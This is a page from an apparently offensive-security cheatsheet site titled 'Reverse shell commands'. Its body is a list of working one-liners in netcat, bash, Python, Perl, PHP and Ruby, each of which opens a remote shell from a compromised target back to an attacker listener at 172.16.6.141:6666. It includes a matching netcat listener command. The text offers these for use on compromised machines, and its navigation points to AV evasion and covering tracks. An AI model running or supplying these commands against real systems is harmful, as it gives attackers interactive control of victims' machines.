<!DOCTYPE html>
<html class="writer-html5" lang="en" >
<head>
  <meta charset="utf-8" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Reverse shell commands &mdash; Cheatsheets</title>
      <link rel="stylesheet" href="../../_static/pygments.css" type="text/css" />
      <link rel="stylesheet" href="../../_static/css/theme.css" type="text/css" />
      <link rel="stylesheet" href="../../_static/css/custom.css" type="text/css" />
    <link rel="shortcut icon" href="../../_static/favicon.ico"/>
  <!--[if lt IE 9]>
    <script src="../../_static/js/html5shiv.min.js"></script>
  <![endif]-->
  
        <script data-url_root="../../" id="documentation_options" src="../../_static/documentation_options.js"></script>
        <script src="../../_static/jquery.js"></script>
        <script src="../../_static/underscore.js"></script>
        <script src="../../_static/_sphinx_javascript_frameworks_compat.js"></script>
        <script src="../../_static/doctools.js"></script>
    <script src="../../_static/js/theme.js"></script>
    <link rel="index" title="Index" href="../../genindex.html" />
    <link rel="search" title="Search" href="../../search.html" />
    <link rel="next" title="Remote file inclusion" href="rfi.html" />
    <link rel="prev" title="Local file inclusion" href="lfi.html" /> 
</head>

<body class="wy-body-for-nav"> 
  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >
            <a href="../../index.html" class="icon icon-home"> Cheatsheets
            <img src="../../_static/logo.png" class="logo" alt="Logo"/>
          </a>
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="../../search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>
        </div><div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <p class="caption" role="heading"><span class="caption-text">Stealth</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../stealth/hide-your-tracks.html">Hide your tracks</a></li>
<li class="toctree-l1"><a class="reference internal" href="../stealth/scanning-stealth.html">Stealth while scanning</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Linux</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../linux/iproute2.html">iproute2</a></li>
<li class="toctree-l1"><a class="reference internal" href="../linux/kernel-modules.html">Kernel modules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../linux/log-commands.html">log commands</a></li>
<li class="toctree-l1"><a class="reference internal" href="../linux/lsof.html">lsof</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Reconnaissance</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../reconnaissance/DNS-registrars.html">DNS registrars</a></li>
<li class="toctree-l1"><a class="reference internal" href="../reconnaissance/Search-public-information.html">Search for public information</a></li>
<li class="toctree-l1"><a class="reference internal" href="../reconnaissance/Shodan-CLI-cheatsheet.html">Shodan CLI cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../reconnaissance/Shodan-cheatsheet.html">Shodan cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../reconnaissance/Wardriving-links.html">WarDriving links</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Scanning</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../scanning/IKE-scan-cheatsheet.html">IKE-scan cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Nessus-cheatsheet.html">Nessus cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Nikto-cheatsheet.html">Nikto cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Nmap-cheatsheet.html">NMap cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Port-scanning-cheatsheet.html">Port scanning cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Ports-cheatsheet.html">Port scanning cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Traceroute-cheatsheet.html">Traceroute cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../scanning/Unicornscan-cheatsheet.html">Unicornscan cheatsheet</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Enumeration</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../enumeration/databases.html">MySQL enumeration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../enumeration/exploits-dbs.html">Exploits databases</a></li>
<li class="toctree-l1"><a class="reference internal" href="../enumeration/linux-post.html">Linux post exploitation enumeration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../enumeration/windows.html">Windows enumeration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../enumeration/windows-post.html">Windows post exploitation enumeration</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Application</span></p>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="csrf.html">CSRF Attack vectors</a></li>
<li class="toctree-l1"><a class="reference internal" href="lfi.html">Local file inclusion</a></li>
<li class="toctree-l1 current"><a class="current reference internal" href="#">Reverse shell commands</a></li>
<li class="toctree-l1"><a class="reference internal" href="rfi.html">Remote file inclusion</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Databases</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../databases/brute-force.html">Brute-force databases</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/comments.html">Comment syntax</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/escape-context.html">Escape context</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/mysql-commands.html">MySQL commands</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/number-of-columns.html">Detect number of columns</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/postgresql-commands.html">PostgreSQL commands</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/sqli-tips.html">SQLi tips</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/sqlmap-cheatsheet.html">SQLMap cheatsheet</a></li>
<li class="toctree-l1"><a class="reference internal" href="../databases/union-select.html">Union SQLi queries</a></li>
</ul>
<p class="caption" role="heading"><span class="caption-text">Payloads</span></p>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../payloads/av-linux.html">Linux antivirus</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/av-windows.html">Windows antivirus</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/evasion-av.html">AV evasion engineering examples</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/evasion-ids.html">IDS/IPS Evasion</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/redirecting.html">Redirecting</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/shells.html">Shells</a></li>
<li class="toctree-l1"><a class="reference internal" href="../payloads/weevely.html">Weevely</a></li>
</ul>

        </div>
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"><nav class="wy-nav-top" aria-label="Mobile navigation menu" >
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="../../index.html">Cheatsheets</a>
      </nav>

      <div class="wy-nav-content">
        <div class="rst-content style-external-links">
          <div role="navigation" aria-label="Page navigation">
  <ul class="wy-breadcrumbs">
      <li><a href="../../index.html" class="icon icon-home"></a> &raquo;</li>
      <li>Reverse shell commands</li>
      <li class="wy-breadcrumbs-aside">
            <a href="../../_sources/docs/application/reverse-shell-commands.md.txt" rel="nofollow"> View page source</a>
      </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
             
  <section id="reverse-shell-commands">
<h1>Reverse shell commands<a class="headerlink" href="#reverse-shell-commands" title="Permalink to this heading"></a></h1>
<p>The adversary will run a listener on their machine and initiates the connection by running a command on the target machine that will connect back to the listener that the attacker is running.</p>
<p>The following examples assume the adversary IP is <code class="docutils literal notranslate"><span class="pre">172.16.6.141</span></code> and port <code class="docutils literal notranslate"><span class="pre">6666</span></code> is used for the connection.
In all of these cases, listen for port <code class="docutils literal notranslate"><span class="pre">6666</span></code> using the following Netcat command: <code class="docutils literal notranslate"><span class="pre">nc</span> <span class="pre">-vv</span> <span class="pre">-l</span> <span class="pre">-p</span> <span class="pre">6666</span></code></p>
<section id="netcat-reverse-shell">
<h2>Netcat reverse shell<a class="headerlink" href="#netcat-reverse-shell" title="Permalink to this heading"></a></h2>
<p>Launching command prompts or cli to be able to execute commands from the hacking machine:</p>
<p>Windows - :</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>nc 172.16.6.141 6666 -e cmd.exe
</pre></div>
</div>
<p>Linux:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>nc 172.16.6.141 6666 -e /bin/bash
</pre></div>
</div>
<p><code class="docutils literal notranslate"><span class="pre">/bin/sh</span></code> can also be used.</p>
</section>
<section id="bash-reverse-shell">
<h2>Bash reverse shell<a class="headerlink" href="#bash-reverse-shell" title="Permalink to this heading"></a></h2>
<p>Once the target is compromised, try launching a Bash reverse shell using:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>bash -i &gt;&amp; /dev/tcp/172.16.6.141/6666 0&gt;&amp;1
</pre></div>
</div>
</section>
<section id="python-reverse-shell">
<h2>Python reverse shell<a class="headerlink" href="#python-reverse-shell" title="Permalink to this heading"></a></h2>
<p>Python is one of the most popular scripting languages and comes preinstalled on most Linux distributions. If the
successfully compromised target is a Linux system, create a Python reverse shell:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>python3 -c &#39;import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); v_ip=&quot;172.16.6.141&quot;; s.connect((v_ip,6666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); v_shell_path=&quot;/usr/bin/bash&quot;;v_shell_value=&quot;-i&quot;; p=subprocess.call([v_shell_path,v_shell_value]);&#39;
</pre></div>
</div>
<p>Replace the <code class="docutils literal notranslate"><span class="pre">v_ip</span></code> and <code class="docutils literal notranslate"><span class="pre">v_shell_path</span></code> values. The <code class="docutils literal notranslate"><span class="pre">v_ip</span></code> is the IP of the attacking machine (Kali Linux) and
the <code class="docutils literal notranslate"><span class="pre">v_shell_path</span></code> is the path to the Bash shell of the target machine.
Some systems use <code class="docutils literal notranslate"><span class="pre">/bin/bash</span></code> while others use <code class="docutils literal notranslate"><span class="pre">/usr/bin/bash</span></code>. To get the path of the Bash shell:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>which bash
</pre></div>
</div>
</section>
<section id="perl-reverse-shell">
<h2>Perl reverse shell<a class="headerlink" href="#perl-reverse-shell" title="Permalink to this heading"></a></h2>
<p>If the target machine has Perl installed, create a reverse shell and connect to the target from the attacking machine
with:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>perl -e &#39;use Socket; $i=&quot;172.16.6.141&quot;;$p=6666; socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;)); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/usr/bin/bash -i&quot;);};&#39;
</pre></div>
</div>
</section>
<section id="php-reverse-shell">
<h2>PHP reverse shell<a class="headerlink" href="#php-reverse-shell" title="Permalink to this heading"></a></h2>
<p>If the target has PHP installed, create a Reverse shell with:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>php -r &#39;$sock=fsockopen(&quot;172.16.6.141&quot;,6666);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;
</pre></div>
</div>
</section>
<section id="ruby-reverse-shell">
<h2>Ruby reverse shell<a class="headerlink" href="#ruby-reverse-shell" title="Permalink to this heading"></a></h2>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>ruby -rsocket -e&#39;f=TCPSocket.open(&quot;172.16.6.141&quot;,6666).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&#39;
</pre></div>
</div>
</section>
</section>


           </div>
          </div>
          <footer><div class="rst-footer-buttons" role="navigation" aria-label="Footer">
        <a href="lfi.html" class="btn btn-neutral float-left" title="Local file inclusion" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left" aria-hidden="true"></span> Previous</a>
        <a href="rfi.html" class="btn btn-neutral float-right" title="Remote file inclusion" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right" aria-hidden="true"></span></a>
    </div>

  <hr/>

  <div role="contentinfo">
        <a href="https://unseen-uni.netlify.app/">Unseen University</a>, 2022

  </div>

   

</footer>
        </div>
      </div>
    </section>
  </div>
  <script>
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(false);
      });
  </script> 

</body>
</html>